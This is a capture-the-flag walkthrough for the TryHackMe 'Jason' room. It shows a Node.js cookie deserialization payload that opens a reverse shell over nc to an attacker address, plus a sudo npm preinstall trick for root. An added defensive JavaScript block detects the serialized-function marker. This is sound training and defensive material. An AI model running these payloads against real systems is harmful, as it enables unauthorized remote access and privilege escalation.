TryHackMe: Jason
Today we will take a look at TryHackMe: Jason. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan
Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.192.78

Let’s take a look at the website.

Let's enter something into the form and look at the request with Burp.

And we see it is built with Node.js. I figured there would be a vulnerability related to JSON handling in Node.js, so I researched a bit and found out there is an RCE vulnerability in the way the cookie is deserialized.
I prepared the following payload for it:
{"email":"test","rce":"_$$ND_FUNC$$_function(){ require('child_process').exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $IP 4444 >/tmp/f', function(error, stdout, stderr) { console.log(stdout) }); }()"}
Since the value has to go into the cookie, I encode it with base64.
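As an added example that is not part of the original writeup, here is the defender's view of the same cookie: a parser that base64-decodes the profile cookie, uses plain JSON.parse (which never evaluates code) instead of an unserialize call, and rejects any field carrying the `_$$ND_FUNC$$_` function marker that the payload above relies on. The cookie format (base64 of a JSON object) and the sample values are assumptions constructed for the example.

```javascript
// Added example, not code from the room or the writeup. Assumes the profile
// cookie is base64(JSON object) and that the vulnerable deserializer turns any
// string starting with this marker back into a function and calls it.
const FUNC_MARKER = '_$$ND_FUNC$$_';

// Decode the cookie to its raw JSON text (Buffer decodes base64 leniently and
// never throws for string input, so malformed input surfaces as bad JSON later).
function decodeCookie(b64) {
  return Buffer.from(b64, 'base64').toString('utf8');
}

// Detection: walk the parsed object and report the JSON path of every string
// value that begins with the function marker, at any depth.
function findSerializedFunctions(value, path = '$') {
  const hits = [];
  if (typeof value === 'string') {
    if (value.startsWith(FUNC_MARKER)) hits.push(path);
  } else if (value && typeof value === 'object') {
    for (const [key, child] of Object.entries(value)) {
      hits.push(...findSerializedFunctions(child, `${path}.${key}`));
    }
  }
  return hits;
}

// Mitigation: parse with JSON.parse only, then refuse the request outright if
// any field tries to smuggle a serialized function, instead of "unserializing".
function parseProfileCookie(b64) {
  let obj;
  try {
    obj = JSON.parse(decodeCookie(b64));
  } catch {
    return { ok: false, reason: 'bad-json' };
  }
  const hits = findSerializedFunctions(obj);
  if (hits.length > 0) {
    return { ok: false, reason: 'serialized-function', hits };
  }
  return { ok: true, profile: obj };
}

// Constructed samples: a benign cookie and one carrying the marker (empty body).
const benign = Buffer.from('{"email":"test"}').toString('base64');
const suspicious = Buffer.from(
  '{"email":"test","rce":"_$$ND_FUNC$$_function(){}()"}'
).toString('base64');
```

Logging the `hits` path of a rejected cookie gives a simple detection signal for this class of request in the application logs.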

Let’s paste to the cookie and listen.

When we refresh the page, we get a shell.

Privilege Escalation
Command: sudo -l
The output shows that npm can be run as root, so let's exploit that.
Command: TF=$(mktemp -d)
Command: echo '{"scripts": {"preinstall": "/bin/bash"}}' > $TF/package.json
Command: sudo /usr/bin/npm -C $TF --unsafe-perm i

And now we are root.

"If you have any questions or comments, please do not hesitate to write. Have a good day."